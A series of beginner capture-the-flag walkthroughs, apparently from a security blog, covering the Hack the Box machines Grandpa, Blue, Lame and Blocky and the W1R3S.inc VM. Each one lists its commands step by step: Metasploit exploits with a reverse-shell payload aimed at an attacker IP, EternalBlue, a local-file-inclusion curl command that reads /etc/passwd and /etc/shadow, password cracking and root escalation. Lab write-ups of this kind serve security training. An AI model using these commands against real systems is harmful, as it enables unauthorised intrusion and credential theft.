Hack the Box Challenge: Grandpa Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Grandpa” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Grandpa Lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Grandpa is 10.10.10.14 so let’s begin with nmap port enumeration.

nmap -p- -sV 10.10.10.14

From nmap result I found following information.

Open port: 80 for http

Service version: Microsoft IIS httpd 6.0

Os : Windows machine.

Then I used searcgsploit for iis 6.0 and found a Remote Buffer overflow vulnerability in Microsoft IIS httpd 6.0, you can check this exploit in google aslo.

Then I run msfconsole command in terminal and load metasploit framework for using Microsoft IIS WebDav ScStoragePathFromUrl Overflow module for exploiting target machine.

use exploit/windows/iis/iis_webdav_scstoragepathfromurl

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) set rhost 10.10.10.14 (target IP)

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) set payload windows/meterpreter/reverse_tcp

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) set lhost 10.10.14.3 (attacker IP)

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) set lport 4444

msf exploit(windows/iis/iis_webdav_scstoragepathfromurl) run

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Then I run command getuid for identify user ID and current process but it failed due to limited shell access we have in session 1 and now we need to privilege escalation.

For that background your current meterpreter shell and go for post exploitation.

Then I run a post exploit “Multi Recon Local Exploit Suggester” that suggests local meterpreter exploits that can be used for further exploit. The exploits are recommended founded on the architecture and platform that the user has a shell opened as well as the available exploits in meterpreter.

use post/multi/recon/local_exploit_suggester

msf post(multi/recon/local_exploit_suggester) > set session 1

msf post(multi/recon/local_exploit_suggester) > run

Wonderful!! Exploit Suggester truly proof itself by suggesting other exploit name to which target is vulnerable. So now we will go with last option as highlighted in image.

At this time use pprFlattenRec Local Privilege Escalation module for making unauthorized access again but as privileged user.

use exploit/windows/local/ppr_flatten_rec

msf exploit(windows/local/ppr_flatten_rec) > set lhost 10.10.14.3

msf exploit(windows/local/ppr_flatten_rec) > set lport 4455

msf exploit(windows/local/ppr_flatten_rec) > run

Nice!! It works and we got meterpreter session 2 as system user and you can check in below image.

Meterpreter > getuid

Now let’s complete this task my searching user.txt and root.txt flag which is hidden somewhere inside a directory.

Meterpreter > shell

Inside c:\Document and Setting\Harry\Desktop I found user.txt file and used type “file name” command for reading this file.

cd Desktop

type user.txt

Great!! We got our 1^st flag successfully

Inside c:\Document and Setting\Administrtator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

typeroot.txt

Great!! We got our 2^st flag successfully

Breaching this lab was interesting and enjoyable moment for me. It will take less time if you are aware of proper metasploit exploits. Therefore I will give all Glory to Metasploit for making this challenge easy for me.

Happy Hacking!!

Hack the Box Challenge: Blue Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Blue” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Blue lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of blue is 10.10.10.40 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.40 --open

From given below image, you can observe that we found so many open ports and port 137, 139 and 445 denotes that it is windows machine.

When I extract complete result of nmap I found following details

·         OS: windows 7 professional

·         Computer name: haris-pc

·         NetBIOS computer name haric-pc

·         Smb version: 2.02

Great!! Form this result I can conclude username can be “haris” moreover smb 2.02 can be exploit by eternal blue vulnerability.

Let confirm eternal blue vulnerability in victims system using namp script.

nmap --script vuln -p445 10.10.10.40

Awesome!! Victim’s machine is vulnerable to eternal blue exploit. 

Then I run msfconsole command in terminal and load metasploit framework for using eternal blue module for exploiting target machine.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 10.10.10.40

msf exploit(windows/smb/ms17_010_eternalblue) >run

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

Inside c:\Users\haris \Desktop I found user.txt file and used type “file name” command for reading this file.

cd Desktop

type user.txt

 Great!! We got our 1^st flag successfully 

Inside c:\Users\Administrator \Desktop I found root.txt file and used type “file name” command for reading this file.

cd Desktop

type root.txt

Great!! We got our 2^st flag successfully.

It was very easy challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hack the Box Challenge: Lame Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Lame” which is lab presented by Hack the Box for making online penetration practices according to your experience level. They have collection of vulnerable labs as challenges from beginners to Expert level. HTB have two partitions of lab i.e. Active and retired since we can’t submit write up of any Active lab therefore we have chosen retried Lame lab.

Level: Beginners

Task: find user.txt and root.txt file in victim’s machine.

Let’s begin the Game!!

Since these labs are online available therefore they have static IP and IP of Lame is 10.10.10.3 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.3

From given below image, you can observe that we found so many open ports such as 21 for ftp, 22 for ssh, 139 and 445 for samba service and also got hit OS platform can be Unix or linux.

 From nmap result we saw samba service smbd 3.x is running in victim’s machine therefore next I search for any exploit related to this service in Google.

Gratefully Google gave me hint in their 2^nd link of exploit DB.

Then I run msfconsole command in terminal and load metasploit framework for using Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution module for exploiting target machine.

use exploit/multi/samba/usermap_script

msf exploit(multi/samba/usermap_script) > set rhost 10.10.10.3

msf exploit(multi/samba/usermap_script) > exploit

Terrific!! I have got unauthorized access of victims command shell through session 1 as shown in below image.

I had updated command shell into meterpreter shell by executing following command.

session -u 1

Inside path: /home/makis I found user.txt file and used cat “file name” command for reading this file.

cd home

ls

cd makis

ls

cat user.txt

Great!! We got our 1^st flag successfully

Inside path: /root I found root.txt file and used cat “file name” command for reading this file.

cd root

ls

cat root.txt

Great!! We got our 2^st flag successfully

It will be very stress-free challenge for those candidate who have knowledge little know vulnerability analysis.

Happy Hacking!!

Hack the Box Challenge: Blocky Walkthrough

Hello friends!! Today we are going to solve another CTF challenge “Blocky ” which is available online for those who want to increase their skill penetration testing and black box testing. Blocky is retried vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level, they have collection of vulnerable labs as challenges from beginners to Expert level. We are going to start a new series of hack the box beginning with Blocky craft which is designed for beginners.

Since these labs are online available therefore they have static IP and IP of blocky is 10.10.10.37 so let’s begin with nmap port enumeration.

nmap -sV 10.10.10.37

From given below image, you can observe we found port 21, 22, 80 are open in victim’s network.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any remarkable clue on its welcome page for next step.

Next we use dirb tool of kali to enumerate the directories and found some important directories such as /phpmyadmin, /wp-admin, /plugin/files and etc which you can confirm from below image.

dirb http://10.10.10.37 /

After browsing so many directories I found plugin/files a bit interested by execute following URL in browser.

http://10.10.10.37/plugin/files.

From given below image you can observe that it has shown two jar file. Let’s download blockycore.jar file and then move for its compilation.

Using online compliers I had complied blockycore.jar file and found something very interesting in it. It contains login credential sqluser and sqlpass as highlighted in below image.

Then I explore http://10.10.10.37/phpmyadmin and login into phpmyadmin server using above credential root: 8YsqfCTnvxAUeduzjNSXe22

Then opened the wordpress database for stealing username from here and I found a user login: Notch with user Id 1.

Now I try to access victim’s system PTs shell through SSH since port 22 is open as per nmap result and I had also found a user name therefore I open a new terminal in kali executed following command to connecting with target network through ssh service.

ssh notch@10.10.1037

For password I try above password found in jar file and got successful login into victims shell.

id

From id result I came to know Notch is first user of system.

By executing sudo -l command it tell us that user Notch has full privileged in this machine.

Then I moved for root access using previous same password and again I get root access successfully.

sudo su

Then inside its home directory I found user.txt file and used cat command for reading this file.

ls

cat user.txt        

Gracefully!! We found 1^st flag of this Lab in user.txt.

Then I moved into root directory where I found root.txt and again use cat command for reading this file.

cd root

ls

cat root.txt

Great!!! We completed this challenge by capturing 2^nd flag in root.txt file.

Hack the W1R3S.inc VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as W1R3S.inc. The credit for making this vm machine goes to “SpecterWires” and it is another capture the flag challenge in which our goal is to gain root access and capture the flag to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let’s start from getting to know the IP of VM (Here, I have it at 192.168.1.106 but you will have to find your own)

netdiscover

Now let’s move towards enumeration in context to identify running services and open of victim’s machine by using the most popular tool Nmap.

nmap -p- -A 192.168.1.106 --open

Awesome!! Nmap has done remarkable job by dumbing the details of services running on open port 21, 22 and 80.

Knowing port 80 is open in victim’s network I preferred to explore his IP in browser but didn’t get any clue on its home page for next step.

Next we use dirb  tool of kali to enumerate the directories and found some important directories such as /administrator /installation and /wordpress /

dirb http://192.168.1.106 /

So next I decided to explore http://192.168.1.106/administrator/installation through browser URL and received installation page as shown in given below image. Moreover noticed that the author has used Cuppa CMS.

With the help of Google I check out for any exploit related to cuppa CMS. And from Google search result, I found exploit 25971 in its first link.

This exploit was pointing toward Cuppa CMS File Inclusion vulnerability. The exploit having hint for exploiting LFI or RFI vulnerability, taking let help from highlighted hint let’s try to exploit our victim.

According to our condition we need to paste malicious code in URL as http:192.168.1.106 /administrator/alerts/alertConfigField.php?urlConfig=../../../../../../../../../etc/passwd for exploiting lfi vulnerability.

Sadly!! Again didn’t get anything accept following blank page of configuration.

After wasting a lot of time on browser I decided to use curl for exploiting LFI vulnerability for obtaining etc/password file.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/passwd http://192.168.1.106/administrator/alerts/alertConfigField.php

When I executed above command for exploring etc/password file, it successfully work and I found first username “w1r3s”.

Then again I executed below command for obtaining password file by using same process.

curl -s --data-urlencode urlConfig=../../../../../../../../../etc/shadow http://192.168.1.106/administrator/alerts/alertConfigField.php

Successfully I found salt password of user w1r3s as shown in given below image. Then I copied this password in a text file as pass.txt for cracking it with john the ripper.

Next I had used john the ripper for cracking pass.txt and from given below image you can observe the highlighted text “computer” as plain text password.

Hence we found username: w1r3s and password: computer

If you remember the output result of nmap then it was showing port 22 is open for SSH. We had also grabbed the username and password, now without wasting timing let login into SSH using above credential username: w1r3s and password: computer.

ssh wlr3s@192.168.1.106

Wonderful!! We have successfully access PTs shell through SSH of victims system.

id

lsb_release -a

Since author has given two the challenges i.e. (i) take root access (ii) capture the Flag.

Let’s take root access through sudo -i command as shown in below image.

Congratulation!! We got root login successfully.

For capturing flag I look into all directories and found flag.txt file. With help of cat command I successfully captured the flag and complete the all challenges of this vm.

ls-la

cat flag.txt

Solving challenge in this lab is not that much hectic therefore it is good task for beginners.